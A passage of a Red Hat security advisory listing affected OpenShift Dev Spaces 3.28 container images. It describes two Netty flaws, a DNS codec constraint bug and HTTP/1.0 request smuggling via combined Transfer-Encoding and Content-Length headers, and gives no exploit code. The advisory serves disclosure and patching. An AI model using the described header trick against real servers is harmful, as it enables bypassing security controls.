fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
A flaw was found in Netty. Netty's DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
Workaround
|
A flaw was found in Netty's HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
